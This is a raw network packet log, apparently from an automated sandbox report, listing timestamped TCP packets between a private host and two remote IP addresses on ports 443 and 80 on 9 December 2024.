                                                  Dec 9, 2024 09:35:32.932451963 CET4434981913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:32.932837963 CET49819443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:32.932843924 CET4434981913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:33.366385937 CET4434981913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:33.366449118 CET4434981913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:33.366648912 CET49819443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:33.366807938 CET49819443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:33.366827965 CET4434981913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:33.366837025 CET49819443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:33.366842031 CET4434981913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:33.370594025 CET49824443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:33.370639086 CET4434982413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:33.370757103 CET49824443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:33.371023893 CET49824443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:33.371038914 CET4434982413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:33.778402090 CET4434982013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:33.778520107 CET4434982113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:33.779201984 CET49820443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:33.779201984 CET49821443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:33.779217005 CET4434982013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:33.779222012 CET4434982113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:33.779619932 CET49820443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:33.779624939 CET4434982013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:33.779635906 CET49821443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:33.779640913 CET4434982113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:33.985918045 CET4434982313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:33.986193895 CET4434982213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:33.986390114 CET49823443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:33.986402988 CET4434982313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:33.986529112 CET49822443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:33.986537933 CET4434982213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:33.986778021 CET49823443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:33.986783028 CET4434982313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:33.986908913 CET49822443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:33.986913919 CET4434982213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:34.109198093 CET4974080192.168.2.493.188.41.36
                                                  Dec 9, 2024 09:35:34.223900080 CET4434982113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:34.223902941 CET4434982013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:34.223956108 CET4434982113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:34.223989010 CET4434982013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:34.224065065 CET49821443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:34.224258900 CET49821443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:34.224261045 CET49820443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:34.224276066 CET4434982113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:34.224282980 CET49820443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:34.224282980 CET49820443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:34.224287987 CET49821443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:34.224294901 CET4434982113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:34.224303007 CET4434982013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:34.224308014 CET4434982013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:34.226958990 CET49825443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:34.226986885 CET4434982513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:34.227000952 CET49826443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:34.227031946 CET4434982613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:34.227060080 CET49825443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:34.227104902 CET49826443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:34.227236986 CET49826443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:34.227252007 CET4434982613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:34.227268934 CET49825443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:34.227284908 CET4434982513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:34.228884935 CET804974093.188.41.36192.168.2.4
                                                  Dec 9, 2024 09:35:34.228946924 CET4974080192.168.2.493.188.41.36
                                                  Dec 9, 2024 09:35:34.419234037 CET4434982313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:34.419289112 CET4434982313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:34.419365883 CET49823443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:34.419516087 CET49823443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:34.419526100 CET4434982313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:34.419538975 CET49823443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:34.419543028 CET4434982313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:34.424638987 CET49827443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:34.424654007 CET4434982713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:34.424732924 CET49827443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:34.424843073 CET49827443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:34.424856901 CET4434982713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:34.452414989 CET4434982213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:34.452465057 CET4434982213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:34.452513933 CET49822443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:34.452658892 CET49822443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:34.452672005 CET4434982213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:34.452708006 CET49822443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:34.452713966 CET4434982213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:34.454693079 CET49828443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:34.454732895 CET4434982813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:34.454817057 CET49828443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:34.454933882 CET49828443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:34.454947948 CET4434982813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:35.087800980 CET4434982413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:35.088196993 CET49824443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:35.088217020 CET4434982413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:35.088701010 CET49824443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:35.088706970 CET4434982413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:35.521802902 CET4434982413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:35.521878958 CET4434982413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:35.521950960 CET49824443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:35.522188902 CET49824443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:35.522207975 CET4434982413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:35.522217989 CET49824443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:35.522222996 CET4434982413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:35.525083065 CET49829443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:35.525120020 CET4434982913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:35.525201082 CET49829443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:35.525347948 CET49829443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:35.525366068 CET4434982913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:35.958030939 CET4434982513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:35.958053112 CET4434982613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:35.958579063 CET49825443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:35.958590984 CET4434982513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:35.958591938 CET49826443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:35.958611965 CET4434982613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:35.959022045 CET49825443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:35.959027052 CET4434982513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:35.959053993 CET49826443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:35.959059000 CET4434982613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:36.152549982 CET4434982713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:36.153198004 CET49827443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:36.153225899 CET4434982713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:36.153667927 CET49827443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:36.153673887 CET4434982713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:36.171003103 CET4434982813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:36.171364069 CET49828443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:36.171396017 CET4434982813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:36.171703100 CET49828443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:36.171708107 CET4434982813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:36.391588926 CET4434982513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:36.391647100 CET4434982513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:36.391860008 CET49825443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:36.391892910 CET49825443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:36.391911983 CET4434982513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:36.391922951 CET49825443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:36.391927958 CET4434982513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:36.392503977 CET4434982613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:36.392553091 CET4434982613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:36.392601013 CET49826443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:36.392781973 CET49826443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:36.392781973 CET49826443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:36.392796040 CET4434982613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:36.392802954 CET4434982613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:36.394660950 CET49830443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:36.394697905 CET4434983013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:36.394723892 CET49831443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:36.394756079 CET4434983113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:36.394764900 CET49830443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:36.394809961 CET49831443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:36.394926071 CET49831443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:36.394927979 CET49830443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:36.394941092 CET4434983013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:36.394942045 CET4434983113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:36.587440968 CET4434982713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:36.587501049 CET4434982713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:36.587696075 CET49827443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:36.587717056 CET49827443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:36.587727070 CET4434982713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:36.587737083 CET49827443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:36.587740898 CET4434982713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:36.590326071 CET49832443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:36.590367079 CET4434983213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:36.590446949 CET49832443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:36.590600014 CET49832443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:36.590614080 CET4434983213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:36.604741096 CET4434982813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:36.604792118 CET4434982813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:36.604928970 CET49828443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:36.604953051 CET49828443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:36.604964972 CET4434982813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:36.604974031 CET49828443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:36.604978085 CET4434982813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:36.606796980 CET49833443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:36.606825113 CET4434983313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:36.606901884 CET49833443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:36.607017040 CET49833443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:36.607029915 CET4434983313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:37.240442038 CET4434982913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:37.240962982 CET49829443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:37.240998983 CET4434982913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:37.241414070 CET49829443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:37.241420984 CET4434982913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:37.673974037 CET4434982913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:37.674030066 CET4434982913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:37.674109936 CET49829443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:37.674350977 CET49829443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:37.674371958 CET4434982913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:37.674382925 CET49829443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:37.674387932 CET4434982913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:37.677603960 CET49834443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:37.677637100 CET4434983413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:37.677716017 CET49834443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:37.677875996 CET49834443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:37.677886963 CET4434983413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:38.108727932 CET4434983013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:38.109491110 CET49830443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:38.109513044 CET4434983013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:38.110223055 CET4434983113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:38.110259056 CET49830443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:38.110264063 CET4434983013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:38.111066103 CET49831443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:38.111085892 CET4434983113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:38.112041950 CET49831443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:38.112047911 CET4434983113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:38.312716007 CET4434983213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:38.313191891 CET49832443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:38.313227892 CET4434983213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:38.313843012 CET49832443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:38.313848972 CET4434983213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:38.326203108 CET4434983313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:38.326647997 CET49833443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:38.326673985 CET4434983313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:38.327049017 CET49833443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:38.327054024 CET4434983313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:38.543318987 CET4434983113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:38.543390036 CET4434983113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:38.543487072 CET49831443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:38.543693066 CET49831443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:38.543709993 CET4434983113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:38.543724060 CET49831443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:38.543730974 CET4434983113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:38.544755936 CET4434983013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:38.544806957 CET4434983013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:38.544876099 CET49830443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:38.545185089 CET49830443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:38.545198917 CET4434983013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:38.545209885 CET49830443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:38.545214891 CET4434983013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:38.546977997 CET49835443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:38.547023058 CET4434983513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:38.547095060 CET49835443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:38.547288895 CET49836443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:38.547321081 CET4434983613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:38.547354937 CET49835443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:38.547369957 CET4434983513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:38.547386885 CET49836443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:38.547563076 CET49836443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:38.547575951 CET4434983613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:38.747592926 CET4434983213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:38.747649908 CET4434983213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:38.747826099 CET49832443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:38.747881889 CET49832443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:38.747895956 CET4434983213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:38.747905970 CET49832443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:38.747910976 CET4434983213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:38.750174046 CET49837443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:38.750207901 CET4434983713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:38.750283957 CET49837443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:38.750427961 CET49837443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:38.750442028 CET4434983713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:38.759740114 CET4434983313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:38.759789944 CET4434983313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:38.759929895 CET49833443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:38.760076046 CET49833443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:38.760087013 CET4434983313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:38.760096073 CET49833443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:38.760102034 CET4434983313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:38.761934996 CET49838443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:38.761949062 CET4434983813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:38.762025118 CET49838443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:38.762137890 CET49838443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:38.762149096 CET4434983813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:39.407052040 CET4434983413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:39.407649994 CET49834443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:39.407664061 CET4434983413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:39.408173084 CET49834443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:39.408175945 CET4434983413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:39.842288971 CET4434983413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:39.842335939 CET4434983413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:39.842408895 CET49834443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:39.842665911 CET49834443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:39.842678070 CET4434983413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:39.842690945 CET49834443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:39.842695951 CET4434983413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:39.845828056 CET49839443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:39.845875978 CET4434983913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:39.845961094 CET49839443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:39.846128941 CET49839443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:39.846146107 CET4434983913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:40.266586065 CET4434983613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:40.269905090 CET4434983513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:40.270081043 CET49836443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:40.270098925 CET4434983613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:40.270270109 CET49835443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:40.270293951 CET4434983513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:40.270674944 CET49836443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:40.270679951 CET4434983613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:40.270709991 CET49835443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:40.270715952 CET4434983513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:40.473587036 CET4434983713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:40.474061012 CET49837443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:40.474085093 CET4434983713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:40.474512100 CET49837443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:40.474518061 CET4434983713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:40.476679087 CET4434983813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:40.476929903 CET49838443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:40.476938963 CET4434983813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:40.477274895 CET49838443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:40.477279902 CET4434983813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:40.702229023 CET4434983613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:40.702286959 CET4434983613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:40.702358961 CET49836443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:40.702593088 CET49836443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:40.702604055 CET4434983613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:40.702615023 CET49836443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:40.702619076 CET4434983613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:40.705894947 CET49840443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:40.705933094 CET4434984013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:40.706016064 CET49840443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:40.706187010 CET49840443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:40.706201077 CET4434984013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:40.717070103 CET4434983513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:40.717132092 CET4434983513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:40.717197895 CET49835443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:40.717304945 CET49835443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:40.717315912 CET4434983513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:40.717325926 CET49835443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:40.717329979 CET4434983513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:40.719621897 CET49841443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:40.719646931 CET4434984113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:40.719712019 CET49841443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:40.719815016 CET49841443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:40.719825983 CET4434984113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:40.906817913 CET4434983713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:40.906877995 CET4434983713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:40.906963110 CET49837443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:40.907165051 CET49837443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:40.907165051 CET49837443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:40.907206059 CET4434983713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:40.907231092 CET4434983713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:40.909811020 CET49842443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:40.909845114 CET4434984213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:40.909924984 CET49842443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:40.910085917 CET49842443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:40.910099983 CET4434984213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:40.910492897 CET4434983813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:40.910547018 CET4434983813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:40.910590887 CET49838443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:40.910696983 CET49838443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:40.910710096 CET4434983813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:40.910722971 CET49838443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:40.910727024 CET4434983813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:40.912666082 CET49843443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:40.912684917 CET4434984313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:40.912756920 CET49843443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:40.912883997 CET49843443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:40.912895918 CET4434984313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:41.560486078 CET4434983913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:41.560965061 CET49839443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:41.560993910 CET4434983913.107.246.63192.168.2.4
